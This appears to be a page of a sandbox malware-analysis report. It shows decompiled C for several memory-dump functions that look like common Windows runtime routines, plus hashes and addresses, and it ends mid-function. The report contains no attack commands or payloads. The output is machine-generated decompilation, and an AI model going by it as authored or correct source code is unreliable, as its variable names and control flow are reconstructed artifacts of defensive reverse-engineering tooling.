Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 173bb9dbbcd0be3f8c9d4c742029edf805d490d77a1cbf823aad8373047dcb15
Instruction ID: b9206bfa41c5db08aafc2c876d2037f398d9f5c7badc9a904e1ca2e7ae368725
Opcode Fuzzy Hash: 173bb9dbbcd0be3f8c9d4c742029edf805d490d77a1cbf823aad8373047dcb15
Instruction Fuzzy Hash: 08515C722197429FD711CF28C884B5ABBE5FFC8B48F04892EF99597240E734E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04CAEF79 Relevance: .2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04CAEF79(void* __ecx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v44;
				void* _v52;
				void* __ebx;
				signed char _t59;
				intOrPtr _t65;
				signed int _t67;
				void* _t75;
				signed char* _t78;
				intOrPtr _t79;
				signed int _t91;
				signed int _t104;
				void* _t118;
				void* _t128;
				signed int _t135;
				void* _t137;

				_t137 = (_t135 & 0xfffffff8) - 0x14;
				_t128 = __ecx;
				_v20 = 0;
				E04CB0FB0(__ecx, _t118, 0x4da68a0, E04CB1260, 0, 0);
				if(E04CAFEDD( &_v24) < 0 ||  *((intOrPtr*)(_t137 + 0x1c)) > 0xa) {
					_t59 = _v20;
				} else {
					_t59 = 3;
					_v20 = _t59;
				}
				_v20 = E04CAFE40(_t128, _t59);
				_v28 = 0;
				_push(E04CAF0E1(_t128, 1));
				_push(0x2000);
				_push( &_v20);
				_push(0);
				_push( &_v28);
				_push(0xffffffff);
				if(E04CF2B10() < 0) {
					L16:
					_t65 = 0;
					goto L13;
				} else {
					if((_v20 & 0x00000001) != 0) {
						_t67 = 1;
					} else {
						_t67 =  *0x4da4360; // 0x10
					}
					_t104 = _t67 * 0x18;
					_t12 = _t104 + 0x7d0; // 0x7d1
					 *((intOrPtr*)(_t137 + 0x18)) = _t12;
					_push(E04CAF0E1(_t128, 1));
					_push(0x1000);
					_push(_t137 + 0x20);
					_push(0);
					_push( &_v24);
					_push(0xffffffff);
					if(E04CF2B10() < 0) {
						 *((intOrPtr*)(_t137 + 0x18)) = 0;
						E04CAFABA( &_v24, _t137 + 0x18, 0x8000);
						goto L16;
					} else {
						_t75 = E04CC3C40();
						_t133 = 0x7ffe0380;
						if(_t75 != 0) {
							_t78 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t78 = 0x7ffe0380;
						}
						if( *_t78 != 0) {
							_t79 =  *[fs:0x30];
							__eflags =  *(_t79 + 0x240) & 0x00000001;
							if(( *(_t79 + 0x240) & 0x00000001) == 0) {
								goto L10;
							}
							__eflags = E04CC3C40();
							if(__eflags != 0) {
								_t133 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							}
							E04D6F1C3(_t104, _t128, _v24, __eflags,  *((intOrPtr*)(_t137 + 0x20)),  *(_t128 + 0x74) << 3,  *_t133 & 0x000000ff);
							E04D6EFD3(_t104, _t128, _v36, _v24, 9);
							goto L10;
						} else {
							L10:
							E04CAFDB5(_t128, _v24, _v20);
							 *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1f4)) =  *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1f4)) + _v20;
							 *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1f8)) =  *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1f8)) +  *((intOrPtr*)(_t137 + 0x18));
							 *((intOrPtr*)(_v28 + 0x18)) = _v20 + _v28;
							 *((intOrPtr*)(_v28 + 0x14)) =  *((intOrPtr*)(_t137 + 0x18)) + _v28;
							_t35 = _v28 + 0x7d0; // 0x7d0
							 *((intOrPtr*)(_v28 + 0x10)) = _t35 + _t104;
							_t91 =  *0x4da6638; // 0x5
							if((_t91 & 0x00000003) == 0) {
								 *0x4da6638 = _t91 | 0x00000001;
								E04CB22A6(_t114);
							}
							 *(_v24 + 0x1b8) = _v20;
							_t65 = _v24;
							L13:
							return _t65;
						}
					}
				}
			}

0x04caef81
0x04caef89
0x04caef97
0x04caef9b
0x04caefab
0x04caefb8
0x04d0db85
0x04d0db87
0x04d0db88
0x04d0db88
0x04caefc6
0x04caefcb
0x04caefd4
0x04caefd5
0x04caefde
0x04caefdf
0x04caefe4
0x04caefe5
0x04caefee
0x04d0dba8
0x04d0dba8
0x00000000
0x04caeff4
0x04caeff9
0x04d0dbb1
0x04caefff
0x04caefff
0x04caefff
0x04caf004
0x04caf00c
0x04caf012
0x04caf01b
0x04caf01c
0x04caf025
0x04caf026
0x04caf02b
0x04caf02c
0x04caf035
0x04d0db9a
0x04d0dba3
0x00000000
0x04caf03b
0x04caf03b
0x04caf040
0x04caf047
0x04d0dbc0
0x04caf04d
0x04caf04d
0x04caf04d
0x04caf052
0x04d0dbca
0x04d0dbd0
0x04d0dbd7
0x00000000
0x00000000
0x04d0dbe2
0x04d0dbe4
0x04d0dbef
0x04d0dbef
0x04d0dbef
0x04d0dc0a
0x04d0dc1b
0x00000000
0x04caf058
0x04caf058
0x04caf062
0x04caf072
0x04caf083
0x04caf093
0x04caf0a0
0x04caf0a7
0x04caf0af
0x04caf0b2
0x04caf0b9
0x04caf0be
0x04caf0c3
0x04caf0c3
0x04caf0d0
0x04caf0d6
0x04caf0da
0x04caf0e0
0x04caf0e0
0x04caf052
0x04caf035

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27d3fd6b51d4b75c357ee8c4474ac7b1da5db375a52e0e2ff63d7867b527827f
Instruction ID: e82d0b2435e089007b7908c6d2dc7706a103d13491b7f7d3a62811c287eb9203
Opcode Fuzzy Hash: 27d3fd6b51d4b75c357ee8c4474ac7b1da5db375a52e0e2ff63d7867b527827f
Instruction Fuzzy Hash: 36518F716083429FD750DF18C884A6BB7EAFF84318F14896EF995C7281D734E915CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04D786A8 Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E04D786A8(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				void* _t69;
				signed int _t73;
				signed char _t86;
				signed int _t89;

				_t74 = __edx;
				_push(__ecx);
				_t86 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0xb0));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t89 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E04D79BB8(_t57, _t86, _t74, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E04D78565(_t86, _t74, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t73 = _t89;
					} else {
						_t73 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t73;
					_t62 = _a8;
					L11:
					_t74 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t86 + 0x10)) == _t89) {
						L19:
						if(( *(_t86 + 0xc) & 0x10000000) == 0) {
							L22:
							_t75 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t89 - 2;
								if(_t89 != 2) {
									_t33 = _t89 + 2; // 0x2
									__eflags = (_t33 << 7) + _t86;
									_t89 = E04D7BA66((_t33 << 7) + _t86, _t75, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E04D7A553(_t86, _v8, _t57);
								asm("sbb esi, esi");
								_t89 =  ~_t89;
								_t41 = E04CC3C40();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t89;
										if(_t89 != 0) {
											E04D6F247(_t86, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E04D7DE9F(_t57, 0x4da6dc8, (_t75 -  *0x4da6dc4 >> 0x14) + (_t75 -  *0x4da6dc4 >> 0x14), _t86, _t89, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t75 = _v12;
							_t27 = _t47 - 1; // -1
							_t89 = _t27;
							goto L25;
						}
						_t62 = _t86;
						if(E04D79B4D(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t89);
						_push(_t89);
						_push(_t89);
						_push(_v8);
						_t69 = 9;
						E04D75FED(_t69, _t86);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E04D578DE(_t62, _t86, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t89;
							}
							goto L19;
						}
						_t62 = _t86;
						_t36 = E04D78565(_t62, _t74, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x04d786a8
0x04d786b0
0x04d786b7
0x04d786b9
0x04d786c0
0x04d786cb
0x04d786cf
0x04d786dc
0x04d786dc
0x04d786df
0x04d786e1
0x04d786e3
0x04d786e6
0x04d7870f
0x04d78712
0x04d78714
0x00000000
0x00000000
0x04d7871a
0x04d7871f
0x04d78722
0x04d78724
0x00000000
0x04d786e8
0x04d786ef
0x04d786f6
0x04d78702
0x04d786fd
0x04d786fd
0x04d786fd
0x04d78707
0x04d7870a
0x04d78726
0x04d78726
0x04d7872a
0x04d78730
0x04d78774
0x04d7877b
0x04d787a4
0x04d787a4
0x04d787a8
0x04d787ab
0x04d787ce
0x04d787ce
0x04d787d1
0x04d7882a
0x04d78831
0x04d78838
0x00000000
0x04d78838
0x04d787d3
0x04d787d4
0x04d787dc
0x04d787e3
0x04d787e5
0x04d787e7
0x04d787ec
0x04d787ee
0x04d78800
0x04d787f0
0x04d787f9
0x04d787f9
0x04d78805
0x04d78808
0x04d7880a
0x04d78810
0x04d78817
0x04d78819
0x04d7881b
0x04d78823
0x04d78823
0x04d7881b
0x04d78817
0x00000000
0x04d78808
0x04d787b6
0x04d787be
0x04d787c3
0x04d787c5
0x00000000
0x00000000
0x04d787c7
0x04d787cb
0x04d787cb
0x00000000
0x04d787cb
0x04d78781
0x04d7878c
0x00000000
0x00000000
0x04d7878e
0x04d7878f
0x04d78790
0x04d78791
0x04d78799
0x04d7879a
0x00000000
0x04d78737
0x04d78737
0x04d78739
0x04d78748
0x04d7874b
0x00000000
0x00000000
0x04d7874d
0x04d78753
0x00000000
0x00000000
0x04d78762
0x04d7876e
0x04d7883a
0x04d78842
0x04d78842
0x00000000
0x04d7876e
0x04d7873d
0x04d7873f
0x04d78746
0x00000000
0x00000000
0x00000000
0x04d78746
0x04d78730

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aac7d4b566b43c2ef7c50fdda280fd2638ab32d51dd2eb62a843f57dc5e086c
Instruction ID: 722d01dd05162f19ecac9a1df1a79c5e086ff0f0afa6081b94a00a4a40e3fdc4
Opcode Fuzzy Hash: 3aac7d4b566b43c2ef7c50fdda280fd2638ab32d51dd2eb62a843f57dc5e086c
Instruction Fuzzy Hash: E941E8717006409BD725EB2AC899B7BB79AFF80764F048219F856CB790F774F801E6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04CAAE40 Relevance: .2, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E04CAAE40(signed int __ebx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t44;
				signed int _t51;
				signed int* _t54;
				signed int _t57;
				signed int _t60;
				signed int _t64;
				void* _t65;
				intOrPtr* _t69;
				signed int _t71;
				void* _t76;
				void* _t77;
				signed int _t78;
				intOrPtr _t80;
				void* _t85;
				void* _t90;
				void* _t91;

				_t83 = __esi;
				_t62 = __ebx;
				_push(0x2c);
				_push(0x4d8ba98);
				E04D07BE4(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x19)) = 0;
				_t80 =  *((intOrPtr*)(_t85 + 8));
				if(_t80 == 0) {
					L4:
					_t44 =  *( *[fs:0x30] + 0xc);
					if( *((char*)(_t44 + 0x28)) == 0) {
						_t44 = E04D84A6D(_t62, _t65, _t76, _t80, _t83);
					}
					L5:
					 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0x10));
					return _t44;
				}
				_t90 = _t80 -  *0x4da6890; // 0x2f107c0
				if(_t90 == 0) {
					goto L4;
				}
				_t91 = _t80 -  *0x4da6888; // 0x0
				if(_t91 == 0 ||  *((char*)( *( *[fs:0x30] + 0xc) + 0x28)) != 0) {
					goto L4;
				} else {
					_t8 = _t80 + 0xe0; // 0xe0
					L04CC2330(_t8, _t8);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t80 + 0xe5));
					if( *((char*)(_t80 + 0xe5)) != 0) {
						E04D84A6D(__ebx, _t65, _t76, _t80, __esi);
						goto L12;
					} else {
						__eflags =  *((char*)(_t80 + 0xe4));
						if( *((char*)(_t80 + 0xe4)) == 0) {
							 *((char*)(_t80 + 0xe4)) = 1;
							_push(_t80);
							_push( *((intOrPtr*)(_t80 + 0x24)));
							E04CF4500();
						}
						while(1) {
							_t15 = _t80 + 8; // 0x8
							_t54 = _t15;
							 *(_t85 - 0x20) = _t54;
							_t62 =  *_t54;
							_t71 = _t54[1];
							 *(_t85 - 0x38) = _t62;
							 *(_t85 - 0x34) = _t71;
							while(1) {
								L10:
								__eflags = _t71;
								if(_t71 == 0) {
									break;
								}
								_t83 = _t62;
								_t78 = _t71;
								 *(_t85 - 0x24) = _t78;
								 *(_t85 - 0x34) = _t71 - 1;
								asm("lock cmpxchg8b [edi]");
								_t62 = _t83;
								 *(_t85 - 0x38) = _t62;
								_t71 = _t78;
								 *(_t85 - 0x34) = _t71;
								__eflags = _t62 - _t83;
								_t80 =  *((intOrPtr*)(_t85 + 8));
								if(_t62 != _t83) {
									continue;
								}
								__eflags = _t71 -  *(_t85 - 0x24);
								if(_t71 !=  *(_t85 - 0x24)) {
									continue;
								}
								__eflags = _t71;
								if(_t71 == 0) {
									break;
								}
								_t57 = 0;
								 *(_t85 - 0x28) = 0;
								_t83 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x30) = _t83;
									__eflags = _t83 - 3;
									if(_t83 >= 3) {
										break;
									}
									__eflags = _t57;
									if(_t57 != 0) {
										L40:
										_t83 =  *_t57;
										__eflags = _t83;
										if(_t83 != 0) {
											_t83 =  *(_t83 + 4);
											__eflags = _t83;
											if(_t83 != 0) {
												 *0x4da91e0(_t57, _t80);
												 *_t83();
											}
										}
										do {
											_t15 = _t80 + 8; // 0x8
											_t54 = _t15;
											 *(_t85 - 0x20) = _t54;
											_t62 =  *_t54;
											_t71 = _t54[1];
											 *(_t85 - 0x38) = _t62;
											 *(_t85 - 0x34) = _t71;
											goto L10;
										} while (_t57 == 0);
										goto L40;
									}
									_t64 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x2c) = _t64;
										__eflags = _t64 -  *0x4da6640; // 0x1
										if(__eflags >= 0) {
											break;
										}
										__eflags = _t57;
										if(_t57 != 0) {
											break;
										}
										_t60 = E04D8523E(_t64, _t64 * 0xc +  *((intOrPtr*)(_t80 + 0x10 + _t83 * 4)), _t78);
										__eflags = _t60;
										if(_t60 == 0) {
											_t57 = 0;
											__eflags = 0;
										} else {
											_t57 = _t60 + 0xfffffff4;
										}
										 *(_t85 - 0x28) = _t57;
										_t64 = _t64 + 1;
									}
									_t83 = _t83 + 1;
								}
								__eflags = _t57;
							}
							 *((intOrPtr*)(_t80 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t80 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x19)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E04CAAF6D(_t80);
							_t51 = E04CC3C40();
							__eflags = _t51;
							if(_t51 != 0) {
								_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t44 = 0x7ffe0386;
							}
							__eflags =  *_t44;
							if( *_t44 != 0) {
								_t44 = E04D84D4B(_t80);
							}
							__eflags =  *((char*)(_t85 - 0x19));
							if( *((char*)(_t85 - 0x19)) == 0) {
								goto L5;
							} else {
								__eflags = _t80 -  *0x4da6890; // 0x2f107c0
								if(__eflags == 0) {
									_t77 = 0x4da6894;
									_t69 = 0x4da6890;
									L20:
									_t44 = E04CB2712(_t62, _t69, _t77, _t80, _t83, __eflags);
									goto L5;
								}
								__eflags = _t80 -  *0x4da6888; // 0x0
								if(__eflags != 0) {
									_t44 = _t44 | 0xffffffff;
									__eflags = _t44;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t44 = E04CAB705(_t62, _t80, _t80, _t83, __eflags);
									}
									goto L5;
								}
								_t77 = 0x4da688c;
								_t69 = 0x4da6888;
								goto L20;
							}
						}
					}
				}
			}

0x04caae40
0x04caae40
0x04caae40
0x04caae42
0x04caae47
0x04caae4c
0x04caae50
0x04caae55
0x04caae76
0x04caae7c
0x04caae83
0x04d0cb12
0x04d0cb12
0x04caae89
0x04caae8c
0x04caae98
0x04caae98
0x04caae57
0x04caae5d
0x00000000
0x00000000
0x04caae5f
0x04caae65
0x00000000
0x04caae9b
0x04caae9b
0x04caaea2
0x04caaea7
0x04caaeab
0x04caaeb2
0x04d0ca34
0x00000000
0x04caaeb8
0x04caaeb8
0x04caaebf
0x04caaec1
0x04caaec8
0x04caaec9
0x04caaecc
0x04caaecc
0x04caaed1
0x04caaed1
0x04caaed1
0x04caaed4
0x04caaed7
0x04caaed9
0x04caaedc
0x04caaedf
0x04caaee2
0x04caaee2
0x04caaee2
0x04caaee4
0x00000000
0x00000000
0x04d0ca3e
0x04d0ca40
0x04d0ca42
0x04d0ca46
0x04d0ca4f
0x04d0ca53
0x04d0ca55
0x04d0ca58
0x04d0ca5a
0x04d0ca5d
0x04d0ca5f
0x04d0ca62
0x00000000
0x00000000
0x04d0ca68
0x04d0ca6b
0x00000000
0x00000000
0x04d0ca71
0x04d0ca73
0x00000000
0x00000000
0x04d0ca79
0x04d0ca7b
0x04d0ca7e
0x04d0ca7e
0x04d0ca80
0x04d0ca80
0x04d0ca83
0x04d0ca86
0x00000000
0x00000000
0x04d0ca88
0x04d0ca8a
0x04d0cac5
0x04d0cac5
0x04d0cac7
0x04d0cac9
0x04d0cacf
0x04d0cad2
0x04d0cad4
0x04d0cade
0x04d0cae4
0x04d0cae4
0x04d0cad4
0x04caaed1
0x04caaed1
0x04caaed1
0x04caaed4
0x04caaed7
0x04caaed9
0x04caaedc
0x04caaedf
0x00000000
0x04caaedf
0x00000000
0x04caaed1
0x04d0ca8c
0x04d0ca8c
0x04d0ca8e
0x04d0ca8e
0x04d0ca91
0x04d0ca97
0x00000000
0x00000000
0x04d0ca99
0x04d0ca9b
0x00000000
0x00000000
0x04d0caa4
0x04d0caa9
0x04d0caab
0x04d0cab2
0x04d0cab2
0x04d0caad
0x04d0caad
0x04d0caad
0x04d0cab4
0x04d0cab7
0x04d0cab7
0x04d0caba
0x04d0caba
0x04d0cabd
0x04d0cabd
0x04caaeed
0x04caaef3
0x04caaefa
0x04caaefe
0x04caaefe
0x04caaf05
0x04caaf0a
0x04caaf0f
0x04caaf11
0x04d0cafc
0x04caaf17
0x04caaf17
0x04caaf17
0x04caaf1c
0x04caaf1f
0x04caaf7c
0x04caaf7c
0x04caaf21
0x04caaf25
0x00000000
0x04caaf2b
0x04caaf2b
0x04caaf31
0x04caaf47
0x04caaf4c
0x04caaf51
0x04caaf51
0x00000000
0x04caaf51
0x04caaf33
0x04caaf39
0x04caaf5b
0x04caaf5b
0x04caaf5e
0x04caaf62
0x04d0cb08
0x04d0cb08
0x00000000
0x04caaf62
0x04caaf3b
0x04caaf40
0x00000000
0x04caaf40
0x04caaf25
0x04caaed1
0x04caaeb2

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee775e4d0aa2083353289345e29eaed768ed417a4f2372fe4db36f4c6d945d25
Instruction ID: 60ac80bf0188e8b2180980c1cbdb2fe5b58d549e6e45da7123b72ff0ea9d12bd
Opcode Fuzzy Hash: ee775e4d0aa2083353289345e29eaed768ed417a4f2372fe4db36f4c6d945d25
Instruction Fuzzy Hash: 8C51C071F04642DFDF29DF68C4847ADBBA2FB48718F18426AD406A7280E335F960D791

Uniqueness

Uniqueness Score: -1.00%

Function 04D42CD0 Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E04D42CD0(signed int __edx, signed int* _a4, signed int _a8, signed char _a12) {
				signed int _v8;
				char _v300;
				signed int _v304;
				signed int _v308;
				signed int* _v312;
				signed int _v316;
				signed char _v320;
				signed int _v324;
				signed int _v328;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t60;
				signed int _t61;
				signed int _t67;
				intOrPtr _t78;
				signed int* _t88;
				void* _t89;
				signed char _t91;
				signed int _t96;
				signed int _t98;
				signed int* _t103;
				void* _t105;
				signed int _t106;
				signed int _t112;
				void* _t113;
				signed int _t114;
				signed int _t116;
				signed int _t118;

				_t98 = __edx;
				_t118 = (_t116 & 0xfffffff8) - 0x144;
				_v8 =  *0x4dab370 ^ _t118;
				_v312 = _a4;
				_t60 = _a12;
				_v320 = _t60;
				if(_a8 == 4) {
					if((_t60 & 0x00000003) == 0) {
						L7:
						_t88 =  &_v300;
						_t61 = 0x120;
						while(1) {
							_v328 = _v328 & 0x00000000;
							_push( &_v328);
							_push(_t61);
							_push(_t88);
							_push(0xb);
							_t112 = E04CF2D10();
							_v324 = _t112;
							if(_t112 < 0 && _t112 != 0xc0000004) {
								break;
							}
							_t91 = _v320;
							if(_t91 == 0) {
								_t98 = (_v328 + 0xfffffffc) / 0x11c * _a8;
								_t112 = 0;
								L28:
								 *_v312 = _t98;
								break;
							}
							if(_t112 >= 0) {
								_t98 =  *_t88 * _a8;
								_v304 = _t98;
								if( *_v312 >= _t98) {
									_t106 = 0;
									_v316 = 0;
									if( *_t88 <= 0) {
										goto L28;
									}
									_t114 = _t91 + 8;
									_v324 = _t114;
									_t103 =  &(_t88[7]);
									do {
										if(_a8 == 4) {
											 *((intOrPtr*)(_t91 + _t106 * 4)) =  *((intOrPtr*)(_t103 - 0x12));
										} else {
											if(_a8 == 0x10c) {
												 *((intOrPtr*)(_t114 - 8)) =  *((intOrPtr*)(_t103 - 0x12));
												 *((intOrPtr*)(_t114 - 4)) =  *((intOrPtr*)(_t103 - 0xe));
												 *_t114 =  *_t103;
												_t96 = 0x40;
												memcpy(_v324 + 2,  &(_t103[0]), _t96 << 2);
												_t118 = _t118 + 0xc;
												_t91 = _v320;
												_t106 = _v316;
												_t114 = _v324;
											}
										}
										_t106 = _t106 + 1;
										_t114 = _t114 + 0x10c;
										_t103 =  &(_t103[0x47]);
										_v316 = _t106;
										_v324 = _t114;
									} while (_t106 <  *_t88);
									_t112 = _v308;
									_t98 = _v304;
									goto L28;
								}
								_t112 = 0xc0000023;
								goto L28;
							}
							if(_t88 !=  &_v300) {
								E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t88);
							}
							_t78 =  *0x4da5d78; // 0x0
							_t88 = E04CC5D90(_t91,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t78 + 0x180000, _v328);
							if(_t88 == 0) {
								_t67 = 0xc000009a;
								L32:
								_pop(_t105);
								_pop(_t113);
								_pop(_t89);
								return E04CF4B50(_t67, _t89, _v8 ^ _t118, _t98, _t105, _t113);
							} else {
								_t61 = _v328;
								continue;
							}
						}
						if(_t88 !=  &_v300) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t88);
						}
						_t67 = _t112;
						goto L32;
					}
					_t67 = 0xc00000f1;
					L6:
					if(_t67 < 0) {
						goto L32;
					}
					goto L7;
				}
				if(_a8 == 0x10c) {
					asm("sbb eax, eax");
					_t67 =  ~(_t60 & 3) & 0xc00000f1;
					goto L6;
				}
				_t67 = 0xc00000f0;
				goto L32;
			}

0x04d42cd0
0x04d42cd8
0x04d42ce5
0x04d42cf5
0x04d42cf9
0x04d42cfd
0x04d42d01
0x04d42d28
0x04d42d37
0x04d42d37
0x04d42d3b
0x04d42d40
0x04d42d40
0x04d42d49
0x04d42d4a
0x04d42d4b
0x04d42d4c
0x04d42d53
0x04d42d55
0x04d42d5b
0x00000000
0x00000000
0x04d42d69
0x04d42d6f
0x04d42e72
0x04d42e76
0x04d42e78
0x04d42e7c
0x00000000
0x04d42e7c
0x04d42d77
0x04d42dc7
0x04d42dcf
0x04d42dd5
0x04d42de1
0x04d42de3
0x04d42de9
0x00000000
0x00000000
0x04d42def
0x04d42df2
0x04d42df6
0x04d42df9
0x04d42dfd
0x04d42e3a
0x04d42dff
0x04d42e06
0x04d42e0f
0x04d42e18
0x04d42e1e
0x04d42e26
0x04d42e27
0x04d42e27
0x04d42e29
0x04d42e2d
0x04d42e31
0x04d42e31
0x04d42e06
0x04d42e3d
0x04d42e3e
0x04d42e44
0x04d42e4a
0x04d42e4e
0x04d42e52
0x04d42e56
0x04d42e5a
0x00000000
0x04d42e5a
0x04d42dd7
0x00000000
0x04d42dd7
0x04d42d7f
0x04d42d8d
0x04d42d8d
0x04d42d92
0x04d42daf
0x04d42db3
0x04d42dbb
0x04d42e99
0x04d42ea0
0x04d42ea1
0x04d42ea2
0x04d42ead
0x04d42db5
0x04d42db5
0x00000000
0x04d42db5
0x04d42db3
0x04d42e84
0x04d42e92
0x04d42e92
0x04d42e97
0x00000000
0x04d42e97
0x04d42d2a
0x04d42d2f
0x04d42d31
0x00000000
0x00000000
0x00000000
0x04d42d31
0x04d42d0a
0x04d42d1d
0x04d42d1f
0x00000000
0x04d42d1f
0x04d42d0c
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6cfc26e224148e047ecb6008142cc3880c3b789a75d6f5c0b4083f7063fc120
Instruction ID: 7fac3f4c341c9b563b13398d479bedebf836da8c91856e2b81c45619f8b143ec
Opcode Fuzzy Hash: c6cfc26e224148e047ecb6008142cc3880c3b789a75d6f5c0b4083f7063fc120
Instruction Fuzzy Hash: 34518A72604201DFD721CF14C880AAAB7E5FBC9394F0589AAF9949B290D374FA45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04D7A553 Relevance: .1, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E04D7A553(intOrPtr* __ecx, char __edx, signed int _a4) {
				char _v12;
				char _v16;
				intOrPtr _v19;
				char _v20;
				intOrPtr _v23;
				void* _v32;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t36;
				signed int _t41;
				void* _t42;
				char* _t54;
				signed int _t63;
				signed int _t71;
				void* _t72;
				signed int _t75;
				unsigned int _t76;
